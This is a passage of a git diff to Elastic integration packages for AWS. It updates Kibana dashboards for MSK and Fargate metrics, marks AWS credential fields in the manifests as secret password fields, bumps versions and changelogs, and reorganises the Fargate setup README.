}, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "5c75d539-3641-4ae8-8b3e-d97496c45c74", + "w": 24, + "x": 0, + "y": 30 + }, + "panelIndex": "5c75d539-3641-4ae8-8b3e-d97496c45c74", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "SumOffsetLag", + "operationType": "median", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.SumOffsetLag.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "243e3dfe-db88-4e6e-92b1-fd86f25ec44a", + "w": 24, + "x": 24, + "y": 30 + }, + "panelIndex": "243e3dfe-db88-4e6e-92b1-fd86f25ec44a", + "title": "MSKBytesInPerSec", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Metrics AWS] MSK Overview", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-21T23:23:15.393Z", + "id": "aws-62d43b00-d10d-11ee-b93f-db5ae1f208de", + "managed": false, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "76247e8d-26c2-4b43-9aa5-f7dc3d2074cf:indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bd807a7f-01e5-4b12-9e31-da545c770961:indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8c6af195-c6ea-4d12-b7d6-1656b62d2694:indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dd04e422-baf3-45cb-ae3e-87811250354a:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2b223bf3-4ce1-4712-9239-375da4bccadd:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "60a4dc4d-a16a-46e7-b10b-456035625ecf:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c75d539-3641-4ae8-8b3e-d97496c45c74:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "243e3dfe-db88-4e6e-92b1-fd86f25ec44a:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_fc374900-4386-4d57-9d59-8d8b940d0c3d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_4806d559-30dd-4890-b999-8240e9249890:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c0dcfa25-9377-4534-9ae6-8ce5b360ee9c:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f11a9c4d-2fd7-44bd-8498-239d6cababcf:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_2cb60304-88a4-4b96-9fb2-77d0ce255793:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_8dd0901c-9fb4-4ecd-b4cf-08826c2c4399:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index bcd73d13786..03f7628cddf 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.0.0 name: aws title: AWS -version: 2.11.3 +version: 2.14.1 description: Collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ conditions: elastic: subscription: basic kibana: - version: "^8.10.2" + version: "^8.12.0" screenshots: - src: /img/metricbeat-aws-overview.png title: metricbeat aws overview @@ -36,20 +36,23 @@ vars: required: false show_user: false - name: access_key_id - type: text + type: password title: Access Key ID + secret: true multi: false required: false show_user: true - name: secret_access_key - type: text + type: password title: Secret Access Key + secret: true multi: false required: false show_user: true - name: session_token - type: text + type: password title: Session Token + secret: true multi: false required: false show_user: true @@ -679,6 +682,7 @@ policy_templates: - securityhub_insights categories: - security + - cloudsecurity_cdr inputs: - type: httpjson title: Collect AWS Security Hub logs via API @@ -704,6 +708,7 @@ policy_templates: - inspector categories: - security + - cloudsecurity_cdr inputs: - type: httpjson title: Collect AWS Inspector logs via API @@ -723,6 +728,8 @@ policy_templates: description: Collect Amazon GuardDuty logs with Elastic Agent. data_streams: - guardduty + categories: + - cloudsecurity_cdr inputs: - type: httpjson title: Collect Amazon GuardDuty logs via API @@ -806,6 +813,28 @@ policy_templates: title: AWS EMR logo size: 32x32 type: image/svg+xml + - name: kafka + title: Amazon Managed Streaming for Apache Kafka (MSK) + description: Collect Amazon MSK metrics with Elastic Agent + data_streams: + - kafka_metrics + categories: + - observability + inputs: + - type: aws/metrics + title: Collect Amazon MSK metrics + description: Collect Amazon MSK metrics using AWS CloudWatch + input_group: metrics + icons: + - src: /img/logo_msk.svg + title: Amazon MSK logo + size: 32x32 + type: image/svg+xml + screenshots: + - src: /img/metricbeat-aws-kafka-overview.png + title: metricbeat aws kafka overview + size: 2640x2240 + type: image/png owner: github: elastic/obs-ds-hosted-services type: elastic diff --git a/packages/aws_logs/changelog.yml b/packages/aws_logs/changelog.yml index b607cb921f3..ade9e5881fc 100644 --- a/packages/aws_logs/changelog.yml +++ b/packages/aws_logs/changelog.yml @@ -1,4 +1,14 @@ -- version: 0.6.0 +- version: "1.1.0" + changes: + - description: Update the package format_version to 3.0.2 and enable 'secret' for the sensitive fields + type: enhancement + link: https://github.com/elastic/integrations/pull/9019 +- version: "1.0.0" + changes: + - description: Release package as GA. + type: enhancement + link: https://github.com/elastic/integrations/pull/8991 +- version: "0.6.0" changes: - description: Update the package format_version to 3.0.0. type: enhancement diff --git a/packages/aws_logs/manifest.yml b/packages/aws_logs/manifest.yml index 3da7fc8ebdc..2374cd4e72e 100644 --- a/packages/aws_logs/manifest.yml +++ b/packages/aws_logs/manifest.yml @@ -1,16 +1,16 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: aws_logs title: Custom AWS Logs description: Collect raw logs from AWS S3 or CloudWatch with Elastic Agent. type: integration -version: "0.6.0" +version: "1.1.0" categories: - observability - custom - aws conditions: kibana: - version: ^8.0.0 + version: ^8.12.0 elastic: subscription: basic policy_templates: @@ -42,20 +42,23 @@ vars: required: false show_user: false - name: access_key_id - type: text + type: password title: Access Key ID + secret: true multi: false required: false show_user: true - name: secret_access_key - type: text + type: password title: Secret Access Key + secret: true multi: false required: false show_user: true - name: session_token - type: text + type: password title: Session Token + secret: true multi: false required: false show_user: true diff --git a/packages/awsfargate/_dev/build/docs/README.md b/packages/awsfargate/_dev/build/docs/README.md index 55660c2ea04..14416c070e8 100644 --- a/packages/awsfargate/_dev/build/docs/README.md +++ b/packages/awsfargate/_dev/build/docs/README.md @@ -1,8 +1,14 @@ # AWS Fargate Integration -The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are a part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. +## Overview -## How to set it up +The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. + +## Credentials + +No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. + +## Setup To start collecting AWS Fargate metrics, you must run the Elastic Agent as a [sidecar](https://www.oreilly.com/library/view/designing-distributed-systems/9781491983638/ch02.html) container alongside your application container in the same task definition. @@ -24,37 +30,27 @@ TaskDefinition: Image: - Name: elastic-agent-container << ===== Elastic Agent container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 ``` The Elastic Agent collects metrics using the [Amazon ECS task metadata endpoint](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-fargate.html). The Amazon ECS task metadata endpoint is an HTTP endpoint available to each container and enabled by default on [AWS Fargate platform version 1.4.0](https://aws.amazon.com/blogs/containers/aws-fargate-launches-platform-version-1-4/) and later. The Elastic Agent uses [Task metadata endpoint version 4](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-v4-fargate.html). -## Credentials - -No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. - -## Getting Started +## Getting started using the AWS Management Console This section shows you how to run the Elastic Agent in a ECS cluster, start collecting Fargate on ECS metrics, and send them to an Elastic Stack. -First, we'll see a simple example, setting up a task definition and a service on an existing ECS cluster using the AWS web console; this is the quickest path to have the integration up and running in your existing ECS cluster. - -Second, we'll see a complete setup from scratch of a cluster, a service, and a task using a CloudFormation template and the AWS CLI. - -Let's get started! - -### Using the AWS web console - -#### Task Definition +To quickly deploy on your existing ECS cluster, follow these steps. -Open the AWS web console and visit the Amazon ECS page. Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. +### Task Definition -In the step 1 select "Fargate" from the list of available launch types. +Open the AWS Management Console and visit the Amazon ECS page. Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. -In the step 2: +Step 1: +- Select "Fargate" from the list of available launch types. +Step 2: - Add your preferred name for the "Task definition name", for example "elastic-agent-fargate-deployment". - For the "Task role", select "ecsFargateTaskExecutionRole". - For the "Operating system family", select "Linux". @@ -64,7 +60,7 @@ In the step 2: As for the container, you can use the following values: - Container name: `elastic-agent-container` -- Image: `docker.elastic.co/beats/elastic-agent:8.1.0` +- Image: `docker.elastic.co/beats/elastic-agent:8.12.0` - Environment variables: - FLEET_ENROLL: `yes` - FLEET_ENROLLMENT_TOKEN: `` @@ -72,13 +68,13 @@ As for the container, you can use the following values: Tip: use the AWS Secrets Manager to store the Fleet Server enrollment token. -#### Service +### Service Select an existing ECS cluster and create a new service with launch type "FARGATE". Use the task definition we just created. As soon as the Elastic Agent is started, open the dashboard "\[AWS Fargate\] Fargate Overview" and you will see the metrics show up in few minutes. -### Using the AWS CLI +## Getting started using the AWS CLI In this example, we will use the AWS CLI and a CloudFormation template to set up the following resources: @@ -86,11 +82,11 @@ In this example, we will use the AWS CLI and a CloudFormation template to set up - a task definition for the Elastic Agent, - a service to execute the agent task on the cluster. -#### Setup +### Setup Prepare you terminal and AWS environment to create the ECS cluster for the testing. -##### Pick a region +#### Pick a region Set default AWS region for this session: @@ -98,7 +94,7 @@ Set default AWS region for this session: export AWS_DEFAULT_REGION="us-east-1" ``` -##### Secrets management +#### Secrets management Store the enrollment token and the Fleet Server URL in the AWS Secrets Manager: @@ -122,11 +118,11 @@ aws secretsmanager put-secret-value \ --secret-string ``` -##### Networking +#### Networking One more thing. You need to pick one subnet where your ECS cluster will be created in. Take note of the subnet ID for the very next step. -#### Deploy the stack +### Deploy the stack Copy the following CloudFormation template and save it on you computer with the name `cloudformation.yml`: @@ -207,7 +203,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: elastic-agent-container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 Secrets: - Name: FLEET_ENROLLMENT_TOKEN ValueFrom: !Ref FleetEnrollmentTokenSecretArn @@ -271,7 +267,7 @@ The AWS CLI will return a `StackId`: } ``` -Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS web console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): +Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS Management Console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): ```shell $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .StackStatus' @@ -281,7 +277,7 @@ $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .S That's it! -#### Clean up +### Clean up Once you're done with experimenting, you can remove all the resources (ECS cluster, task, service, etc) with the following command: diff --git a/packages/awsfargate/changelog.yml b/packages/awsfargate/changelog.yml index 0bee93f3b76..e74f74c9c32 100644 --- a/packages/awsfargate/changelog.yml +++ b/packages/awsfargate/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: 1.0.0 + changes: + - description: Make AWS Fargate GA + type: enhancement + link: https://github.com/elastic/integrations/pull/7366 +- version: 0.5.1 + changes: + - description: Improve documentation + type: enhancement + link: https://github.com/elastic/integrations/pull/9130 +- version: 0.5.0 + changes: + - description: Remove memory.usage.pct field and use memory.usage.total instead for plain memory usage. + type: bugfix + link: https://github.com/elastic/integrations/pull/8254 - version: 0.4.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/awsfargate/data_stream/task_stats/fields/fields.yml b/packages/awsfargate/data_stream/task_stats/fields/fields.yml index f19aa6a79f8..33a2711954c 100644 --- a/packages/awsfargate/data_stream/task_stats/fields/fields.yml +++ b/packages/awsfargate/data_stream/task_stats/fields/fields.yml @@ -312,12 +312,6 @@ format: bytes description: | Max memory usage. - - name: pct - type: scaled_float - metric_type: gauge - format: percent - description: | - Memory usage percentage. - name: total type: long metric_type: gauge diff --git a/packages/awsfargate/data_stream/task_stats/manifest.yml b/packages/awsfargate/data_stream/task_stats/manifest.yml index 6aee989ec6b..ccc532e3d67 100644 --- a/packages/awsfargate/data_stream/task_stats/manifest.yml +++ b/packages/awsfargate/data_stream/task_stats/manifest.yml @@ -1,6 +1,5 @@ type: metrics title: AWS Fargate task_stats metrics -release: beta elasticsearch: index_mode: "time_series" streams: diff --git a/packages/awsfargate/data_stream/task_stats/sample_event.json b/packages/awsfargate/data_stream/task_stats/sample_event.json index 1cee8fce259..60881d31920 100644 --- a/packages/awsfargate/data_stream/task_stats/sample_event.json +++ b/packages/awsfargate/data_stream/task_stats/sample_event.json @@ -125,7 +125,6 @@ }, "usage": { "max": 15294464, - "pct": 0.003136136404770672, "total": 12349440 } }, diff --git a/packages/awsfargate/docs/README.md b/packages/awsfargate/docs/README.md index d9fb594fbaa..d00a269918f 100644 --- a/packages/awsfargate/docs/README.md +++ b/packages/awsfargate/docs/README.md @@ -1,8 +1,14 @@ # AWS Fargate Integration -The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are a part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. +## Overview -## How to set it up +The AWS Fargate integration helps to retrieve metadata, network metrics, and Docker stats about your containers and the tasks that are part of an [Amazon Elastic Container Service (Amazon ECS)](https://aws.amazon.com/ecs/?pg=ln&sec=hiw) cluster. + +## Credentials + +No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. + +## Setup To start collecting AWS Fargate metrics, you must run the Elastic Agent as a [sidecar](https://www.oreilly.com/library/view/designing-distributed-systems/9781491983638/ch02.html) container alongside your application container in the same task definition. @@ -24,37 +30,27 @@ TaskDefinition: Image: - Name: elastic-agent-container << ===== Elastic Agent container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 ``` The Elastic Agent collects metrics using the [Amazon ECS task metadata endpoint](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-fargate.html). The Amazon ECS task metadata endpoint is an HTTP endpoint available to each container and enabled by default on [AWS Fargate platform version 1.4.0](https://aws.amazon.com/blogs/containers/aws-fargate-launches-platform-version-1-4/) and later. The Elastic Agent uses [Task metadata endpoint version 4](https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-v4-fargate.html). -## Credentials - -No AWS credentials are required for this integration. The ECS task metadata endpoint is accessible inside the cluster only. - -## Getting Started +## Getting started using the AWS Management Console This section shows you how to run the Elastic Agent in a ECS cluster, start collecting Fargate on ECS metrics, and send them to an Elastic Stack. -First, we'll see a simple example, setting up a task definition and a service on an existing ECS cluster using the AWS web console; this is the quickest path to have the integration up and running in your existing ECS cluster. - -Second, we'll see a complete setup from scratch of a cluster, a service, and a task using a CloudFormation template and the AWS CLI. - -Let's get started! - -### Using the AWS web console - -#### Task Definition +To quickly deploy on your existing ECS cluster, follow these steps. -Open the AWS web console and visit the Amazon ECS page. Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. +### Task Definition -In the step 1 select "Fargate" from the list of available launch types. +Open the AWS Management Console and visit the Amazon ECS page. Here you can select "Task Definitions" and then "Create new Task Definition" to start the wizard. -In the step 2: +Step 1: +- Select "Fargate" from the list of available launch types. +Step 2: - Add your preferred name for the "Task definition name", for example "elastic-agent-fargate-deployment". - For the "Task role", select "ecsFargateTaskExecutionRole". - For the "Operating system family", select "Linux". @@ -64,7 +60,7 @@ In the step 2: As for the container, you can use the following values: - Container name: `elastic-agent-container` -- Image: `docker.elastic.co/beats/elastic-agent:8.1.0` +- Image: `docker.elastic.co/beats/elastic-agent:8.12.0` - Environment variables: - FLEET_ENROLL: `yes` - FLEET_ENROLLMENT_TOKEN: `` @@ -72,13 +68,13 @@ As for the container, you can use the following values: Tip: use the AWS Secrets Manager to store the Fleet Server enrollment token. -#### Service +### Service Select an existing ECS cluster and create a new service with launch type "FARGATE". Use the task definition we just created. As soon as the Elastic Agent is started, open the dashboard "\[AWS Fargate\] Fargate Overview" and you will see the metrics show up in few minutes. -### Using the AWS CLI +## Getting started using the AWS CLI In this example, we will use the AWS CLI and a CloudFormation template to set up the following resources: @@ -86,11 +82,11 @@ In this example, we will use the AWS CLI and a CloudFormation template to set up - a task definition for the Elastic Agent, - a service to execute the agent task on the cluster. -#### Setup +### Setup Prepare you terminal and AWS environment to create the ECS cluster for the testing. -##### Pick a region +#### Pick a region Set default AWS region for this session: @@ -98,7 +94,7 @@ Set default AWS region for this session: export AWS_DEFAULT_REGION="us-east-1" ``` -##### Secrets management +#### Secrets management Store the enrollment token and the Fleet Server URL in the AWS Secrets Manager: @@ -122,11 +118,11 @@ aws secretsmanager put-secret-value \ --secret-string ``` -##### Networking +#### Networking One more thing. You need to pick one subnet where your ECS cluster will be created in. Take note of the subnet ID for the very next step. -#### Deploy the stack +### Deploy the stack Copy the following CloudFormation template and save it on you computer with the name `cloudformation.yml`: @@ -207,7 +203,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: elastic-agent-container - Image: docker.elastic.co/beats/elastic-agent:8.1.0 + Image: docker.elastic.co/beats/elastic-agent:8.12.0 Secrets: - Name: FLEET_ENROLLMENT_TOKEN ValueFrom: !Ref FleetEnrollmentTokenSecretArn @@ -271,7 +267,7 @@ The AWS CLI will return a `StackId`: } ``` -Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS web console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): +Check the stack status until it has reached the `CREATE_COMPLETE` status. Use the AWS Management Console or the AWS CLI (requires the tool [jq](https://stedolan.github.io/jq/)): ```shell $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .StackStatus' @@ -281,7 +277,7 @@ $ aws cloudformation list-stacks | jq '.StackSummaries[] | .StackName + " " + .S That's it! -#### Clean up +### Clean up Once you're done with experimenting, you can remove all the resources (ECS cluster, task, service, etc) with the following command: @@ -352,7 +348,6 @@ If you want to learn more about Amazon ECS metrics, take a look at the blog post | awsfargate.task_stats.memory.rss.usage.total | Total memory usage. | long | gauge | | awsfargate.task_stats.memory.stats.\* | Raw memory stats from the cgroups memory.stat interface | unsigned_long | | | awsfargate.task_stats.memory.usage.max | Max memory usage. | long | counter | -| awsfargate.task_stats.memory.usage.pct | Memory usage percentage. | scaled_float | gauge | | awsfargate.task_stats.memory.usage.total | Total memory usage. | long | gauge | | awsfargate.task_stats.network.\*.inbound.bytes | Total number of incoming bytes. | long | counter | | awsfargate.task_stats.network.\*.inbound.dropped | Total number of dropped incoming packets. | long | counter | @@ -521,7 +516,6 @@ An example event for `task_stats` looks as following: }, "usage": { "max": 15294464, - "pct": 0.003136136404770672, "total": 12349440 } }, diff --git a/packages/awsfargate/img/awsfargate-integration-overview.png b/packages/awsfargate/img/awsfargate-integration-overview.png index 79e79267004..b6481ea9665 100644 Binary files a/packages/awsfargate/img/awsfargate-integration-overview.png and b/packages/awsfargate/img/awsfargate-integration-overview.png differ diff --git a/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json b/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json index 16271ba9b23..ba08f85277d 100644 --- a/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json +++ b/packages/awsfargate/kibana/dashboard/awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63.json @@ -4,1104 +4,1254 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"ee100059-0e56-4e9b-ae09-ff53234bdf8c\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"cloud.region\",\"title\":\"Region Name\",\"id\":\"ee100059-0e56-4e9b-ae09-ff53234bdf8c\",\"enhancements\":{}}},\"e967cd1f-7491-4e72-8d63-23fcef40b9cc\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"awsfargate.task_stats.cluster_name\",\"title\":\"Cluster Name\",\"id\":\"e967cd1f-7491-4e72-8d63-23fcef40b9cc\",\"enhancements\":{}}},\"b2adcf17-72de-46e8-87b1-94c16c399bf0\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"container.labels.com_amazonaws_ecs_task-definition-family\",\"title\":\"Task Name\",\"id\":\"b2adcf17-72de-46e8-87b1-94c16c399bf0\",\"enhancements\":{}}}}" + "panelsJSON": "{\"17bd1c1a-3360-43ae-90d7-f4ad286bbbce\":{\"order\":0,\"width\":\"small\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"cloud.region\",\"title\":\"Region Name\",\"id\":\"17bd1c1a-3360-43ae-90d7-f4ad286bbbce\",\"enhancements\":{},\"searchTechnique\":\"prefix\"}},\"97e445ae-63fe-4841-a7f9-cac0071c336b\":{\"order\":1,\"width\":\"small\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"awsfargate.task_stats.cluster_name\",\"title\":\"Cluster Name\",\"id\":\"97e445ae-63fe-4841-a7f9-cac0071c336b\",\"enhancements\":{},\"searchTechnique\":\"prefix\"}},\"12d08143-512a-4a8a-ae17-101d4786f7c1\":{\"order\":2,\"width\":\"small\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"container.labels.com_amazonaws_ecs_task-definition-family\",\"title\":\"Task Name\",\"id\":\"12d08143-512a-4a8a-ae17-101d4786f7c1\",\"enhancements\":{},\"searchTechnique\":\"prefix\"}},\"5bf10aa8-18dc-488b-a012-d7391b591685\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"5bf10aa8-18dc-488b-a012-d7391b591685\",\"fieldName\":\"container.id\",\"title\":\"Container ID\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"prefix\",\"enhancements\":{}}},\"257ac79f-80db-4f65-b10a-b680c7f217e1\":{\"type\":\"optionsListControl\",\"order\":4,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"257ac79f-80db-4f65-b10a-b680c7f217e1\",\"fieldName\":\"container.name\",\"title\":\"Container Name\",\"grow\":true,\"width\":\"small\",\"searchTechnique\":\"prefix\",\"enhancements\":{}}}}" }, "description": "Overview of AWS Fargate Metrics", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], "query": { "language": "kuery", "query": "" - } + }, + "filter": [ + { + "meta": { + "disabled": false, + "negate": false, + "alias": null, + "key": "data_stream.dataset", + "field": "data_stream.dataset", + "params": { + "query": "awsfargate.task_stats" + }, + "type": "phrase", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "awsfargate.task_stats" + } + }, + "$state": { + "store": "appState" + } + } + ] } }, "optionsJSON": { "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ - { - "embeddableConfig": { + { + "type": "lens", + "gridData": { + "h": 14, + "i": "dce84c11-4c70-448f-86c4-820b164072b6", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "dce84c11-4c70-448f-86c4-820b164072b6", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ + "title": "Container Table [Metrics AWSFargate]", + "description": "", + "visualizationType": "lnsDatatable", + "type": 